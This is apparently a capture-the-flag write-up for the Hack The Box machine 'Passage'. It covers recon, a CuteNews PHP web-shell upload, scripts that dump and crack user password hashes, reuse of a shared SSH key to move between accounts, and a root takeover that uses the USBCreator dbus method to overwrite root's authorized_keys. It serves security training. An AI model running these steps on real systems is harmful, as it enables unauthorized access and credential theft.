
recon:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 00:15 EDT
Nmap scan report for passage.htb (10.129.7.210)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds

This box runs Fail2ban: scan too aggressively and your IP is banned for a while. The author's rating of the machine also puts the CVE score far above Enumeration, which suggests that brute-forcing is most likely not required.

Port 80 is CuteNews. Searching for the most recent exploit turns up this one: https://www.exploit-db.com/exploits/48458

That exploit requires the user to be at least an Editor, whereas a self-registered user is only a Commenter. The one from a year earlier still works, though: https://www.exploit-db.com/exploits/46698

The Metasploit module would not import, but a quick read of it shows the bug is simple: the avatar upload on the user profile page accepts a .php file as-is, so uploading a PHP web shell as the avatar gives code execution.

Once on the box, /var/www/html/CuteNews/cdata/users/ holds the credentials of a large number of users. (This CMS does not use a relational database: everything is stored base64-encoded inside PHP files.)

# each cdata/users/*.php holds one user record: line 1 is a PHP guard,
# line 2 is the base64-encoded serialised array with name, email and hash
for i in /var/www/html/CuteNews/cdata/users/*.php
do
    sed -n 2p "$i" | base64 -d
    echo
    echo -------------------------------------------------------------------
    echo
done

Passwords are stored as SHA-256 digests. One of them cracks to atlanta1, and that password lets us su to paul.
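The loop above only decodes the records. The script below is an added example and not part of the original write-up: it walks the declared-length strings of the PHP-serialised array (so a stray quote inside a value cannot confuse it), pulls out name, e-mail and the SHA-256 digest of each user, and checks every digest against a wordlist. The file names, user names, e-mails and wordlist embedded in it are constructed for the example, and the helper names (php_strings, dump_users and so on) are mine, not CuteNews'.

```python
import base64
import glob
import hashlib
import os
import re
import sys

# Constructed sample files mimicking cdata/users/<name>.php: line 1 is the PHP
# guard, line 2 a base64 blob holding a PHP-serialised array. Names and e-mails
# are invented; the hashes are sha256("atlanta1") and sha256("Winter2020").
def _make_user_file(name, email, password):
    digest = hashlib.sha256(password.encode()).hexdigest()
    record = (
        'a:1:{s:4:"name";a:1:{s:%d:"%s";a:4:{'
        's:4:"name";s:%d:"%s";s:3:"acl";s:1:"2";'
        's:5:"email";s:%d:"%s";s:4:"pass";s:64:"%s";}}}'
        % (len(name), name, len(name), name, len(email), email, digest)
    )
    return ("<?php die('Direct call - access denied'); ?>\n"
            + base64.b64encode(record.encode()).decode() + "\n")

SAMPLE_FILES = {
    "alice-example.php": _make_user_file("alice-example", "alice@example.test", "atlanta1"),
    "bob-example.php": _make_user_file("bob-example", "bob@example.test", "Winter2020"),
}

_PHP_STR = re.compile(r's:(\d+):"')

def php_strings(blob):
    """Return every string in a PHP-serialised blob, in order, using the
    declared byte length so quotes inside a value cannot break the walk."""
    out, pos = [], 0
    while True:
        m = _PHP_STR.search(blob, pos)
        if not m:
            return out
        n, start = int(m.group(1)), m.end()
        out.append(blob[start:start + n])
        pos = start + n + 2          # skip the closing quote and ';'

def parse_user_file(text):
    """Decode line 2 of a cdata/users file and pull name/email/pass out of it."""
    # latin-1 keeps one char per byte, so PHP's byte lengths stay valid
    blob = base64.b64decode(text.splitlines()[1]).decode("latin-1")
    strs = php_strings(blob)
    fields = {}
    for i, s in enumerate(strs[:-1]):
        # the first "name"/"email"/"pass" key is followed by its value
        if s in ("name", "email", "pass") and s not in fields:
            fields[s] = strs[i + 1]
    return fields

def crack_sha256(hex_digest, wordlist):
    """Unsalted SHA-256 lookup; returns the matching word or None."""
    hex_digest = hex_digest.lower()
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == hex_digest:
            return word
    return None

def dump_users(files, wordlist):
    """files: {filename: contents}. Returns one dict per user, sorted by filename."""
    rows = []
    for fname in sorted(files):
        f = parse_user_file(files[fname])
        f["plaintext"] = crack_sha256(f.get("pass", ""), wordlist)
        rows.append(f)
    return rows

def load_user_dir(path):
    """Read a real cdata/users/ directory into the {filename: contents} shape."""
    return {os.path.basename(p): open(p, errors="replace").read()
            for p in glob.glob(os.path.join(path, "*.php"))}

if __name__ == "__main__":
    # usage: python3 cute_users.py [/var/www/html/CuteNews/cdata/users] [wordlist]
    files = load_user_dir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_FILES
    words = open(sys.argv[2]).read().split() if len(sys.argv) > 2 else ["password", "atlanta1"]
    for row in dump_users(files, words):
        print("%-20s %-28s %s  ->  %s" % (row.get("name"), row.get("email"),
                                          row.get("pass"), row["plaintext"]))
```

Run it on the box with the users directory as the first argument and a wordlist as the second; with no arguments it runs on the constructed sample. Anything it cannot crack is still printed with its digest so the hash can be handed to hashcat.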

paul's .ssh/authorized_keys contains a public key for another user, nadav, and it is identical to the .ssh/id_rsa.pub in paul's own home directory, i.e. the two accounts share one key pair. On the guess that nadav's .ssh/authorized_keys therefore holds this key as well, logging in as nadav with /home/paul/.ssh/id_rsa succeeds.
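Comparing two files by eye works for two users; on a box with more home directories it is quicker to compare fingerprints. The script below is an added example, not part of the write-up: it computes the same SHA256 fingerprint that ssh-keygen -lf prints and reports, per key, which accounts hold a matching *.pub and which accounts list it in authorized_keys. The key blobs and file contents embedded in it are constructed stand-ins (not real RSA keys; ssh-keygen would reject them); the paths and the nadav@passage comment mirror the box.

```python
import base64
import glob
import hashlib
import os

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-")

def split_key(line):
    """Return (base64 blob, comment) of an OpenSSH public-key line, skipping any
    authorized_keys options such as command="..." that precede the key type."""
    parts = line.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.startswith(KEY_TYPES):
            return parts[i + 1], " ".join(parts[i + 2:])
    return None, None

def fingerprint(line):
    """The SHA256 fingerprint `ssh-keygen -lf` prints: base64(sha256(blob)), unpadded."""
    blob = base64.b64decode(split_key(line)[0])
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def owner_of(path):
    """/home/<user>/.ssh/... -> user, /root/.ssh/... -> root."""
    parts = path.split("/")
    return "root" if parts[1] == "root" else parts[2]

def map_keys(files):
    """files: {path: contents}. For each distinct key: which users hold its private
    half (judged by a *.pub beside it) and which users accept it in authorized_keys."""
    table = {}
    for path, text in files.items():
        for line in text.splitlines():
            blob, comment = split_key(line.strip())
            if line.lstrip().startswith("#") or blob is None:
                continue
            entry = table.setdefault(fingerprint(line), {
                "comment": comment, "private_key_of": set(), "accepted_by": set()})
            if path.endswith("authorized_keys"):
                entry["accepted_by"].add(owner_of(path))
            elif path.endswith(".pub"):
                entry["private_key_of"].add(owner_of(path))
    return {fp: {"comment": e["comment"],
                 "private_key_of": sorted(e["private_key_of"]),
                 "accepted_by": sorted(e["accepted_by"])} for fp, e in table.items()}

# Constructed sample. The blobs are placeholder bytes, not real keys; the layout
# mirrors the write-up: paul's id_rsa.pub carries the nadav@passage comment and
# both accounts accept it. OTHER shows a key with an options prefix.
def _fake(blob_text, comment):
    return "ssh-rsa %s %s" % (base64.b64encode(blob_text.encode()).decode(), comment)

SHARED = _fake("constructed key blob A", "nadav@passage")
OTHER = _fake("constructed key blob B", "paul@passage")
SAMPLE_FILES = {
    "/home/paul/.ssh/id_rsa.pub": SHARED + "\n",
    "/home/paul/.ssh/authorized_keys": SHARED + "\n",
    "/home/nadav/.ssh/authorized_keys": 'command="/bin/true" ' + OTHER + "\n" + SHARED + "\n",
}

def load_home_keys():
    """Collect every readable *.pub and authorized_keys under /home/* and /root."""
    paths = glob.glob("/home/*/.ssh/*") + glob.glob("/root/.ssh/*")
    return {p: open(p, errors="replace").read() for p in paths
            if p.endswith((".pub", "authorized_keys")) and os.access(p, os.R_OK)}

if __name__ == "__main__":
    files = load_home_keys() or SAMPLE_FILES   # falls back to the sample when nothing is readable
    for fp, e in map_keys(files).items():
        print(fp, e["comment"], "| private key of:", e["private_key_of"],
              "| accepted by:", e["accepted_by"])
```

A key that shows up under private_key_of for one user and under accepted_by for another is exactly the lateral move used above.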

nadav's group memberships are:

nadav@passage:/home/paul/.ssh$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

The problem is dbus: the com.ubuntu.USBCreator system service runs as root, and its Image method copies whatever source path it is handed to whatever destination path it is handed, so any file on the system can be overwritten as root. Details here: https://www.anquanke.com/post/id/181937
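Before reaching for a published exploit it helps to know how such a service is found. The script below is an added example, not from the write-up or from usb-creator: it reads the .service files that tell dbus-daemon which system-bus names are activated as root, and the bus policy files that say who may send messages to those names, and lists the root-activated services that the default context (any user) or a given group can reach. The file contents embedded in it are constructed samples; the USBCreator pair follows the layout of the real files, org.example.Unprivileged is invented for contrast. Deny rules and any polkit check a service performs itself are out of scope, so the output is a candidate list, and the gdbus call below is what testing one candidate looks like.

```python
import configparser
import glob
import os
import xml.etree.ElementTree as ET

# Constructed stand-ins for /usr/share/dbus-1/system-services/*.service and
# /etc/dbus-1/system.d/*.conf (same syntax as the real files).
SERVICE_FILES = {
    "com.ubuntu.USBCreator.service": "[D-BUS Service]\nName=com.ubuntu.USBCreator\n"
        "Exec=/usr/share/usb-creator/usb-creator-helper\nUser=root\n",
    "org.example.Unprivileged.service": "[D-BUS Service]\nName=org.example.Unprivileged\n"
        "Exec=/usr/lib/example/helper\nUser=nobody\n",
}
POLICY_FILES = {
    "com.ubuntu.USBCreator.conf": """<!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"/>
  </policy>
</busconfig>
""",
    "org.example.Unprivileged.conf": """<busconfig>
  <policy user="nobody"><allow own="org.example.Unprivileged"/></policy>
  <policy group="example"><allow send_destination="org.example.Unprivileged"/></policy>
</busconfig>
""",
}

def parse_services(files):
    """{bus name: {"exec": ..., "user": ...}} from .service files (ini syntax)."""
    services = {}
    for text in files.values():
        cp = configparser.ConfigParser(interpolation=None)
        cp.read_string(text)
        sect = cp["D-BUS Service"]
        services[sect["Name"]] = {"exec": sect.get("Exec", ""), "user": sect.get("User", "")}
    return services

def parse_policies(files):
    """{bus name: [who may send to it]}; 'who' is context:default, user:x or group:y.
    <deny> rules are not evaluated, so treat the result as a candidate list."""
    callers = {}
    for text in files.values():
        for policy in ET.fromstring(text).iter("policy"):
            if "user" in policy.attrib:
                who = "user:" + policy.attrib["user"]
            elif "group" in policy.attrib:
                who = "group:" + policy.attrib["group"]
            else:
                who = "context:" + policy.attrib.get("context", "default")
            for allow in policy.findall("allow"):
                dest = allow.attrib.get("send_destination")
                if dest:
                    callers.setdefault(dest, []).append(who)
    return callers

def root_services_reachable(service_files, policy_files):
    """Services activated as root, together with who the bus lets talk to them."""
    callers = parse_policies(policy_files)
    return [
        {"name": name, "exec": info["exec"], "callers": sorted(callers.get(name, []))}
        for name, info in sorted(parse_services(service_files).items())
        if info["user"] == "root"
    ]

def load_dir(pattern):
    return {os.path.basename(p): open(p, errors="replace").read() for p in glob.glob(pattern)}

if __name__ == "__main__":
    # on a real host the system files are world-readable; the sample is the fallback
    services = load_dir("/usr/share/dbus-1/system-services/*.service") or SERVICE_FILES
    policies = load_dir("/etc/dbus-1/system.d/*.conf") or POLICY_FILES
    for f in root_services_reachable(services, policies):
        print("%-32s %-48s callable by: %s" % (
            f["name"], f["exec"], ", ".join(f["callers"]) or "nobody (no allow rule)"))
```

Every name it prints with context:default is a root process any local user can send method calls to; what those methods do with their arguments (here, copying an arbitrary source to an arbitrary destination) is then a matter of reading the helper.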

exploit:

nadav@passage:/tmp$ ssh-keygen -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key.
Your public key has been saved in key.pub.
The key fingerprint is:
SHA256:yqeGMigRB8/SJbkHfUY18B9PJolRomyejn5Z+O7CkGw nadav@passage
The key's randomart image is:
+---[RSA 2048]----+
| o .oo=.. |
|. + o.oo = . |
| = = o+ o + o |
|o * .o . . * |
| + o .o.S . . |
|. E+... |
| o ..+++. |
|o o.. *o. |
|. o.o.+o |
+----[SHA256]-----+
nadav@passage:/tmp$ gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /tmp/key.pub /root/.ssh/authorized_keys true
()
nadav@passage:/tmp$ ssh -i key root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Last login: Sun Sep 6 03:37:26 2020 from 10.10.14.18
root@passage:~# whoami && hostname && wc -c /root/root.txt
root
passage
33 /root/root.txt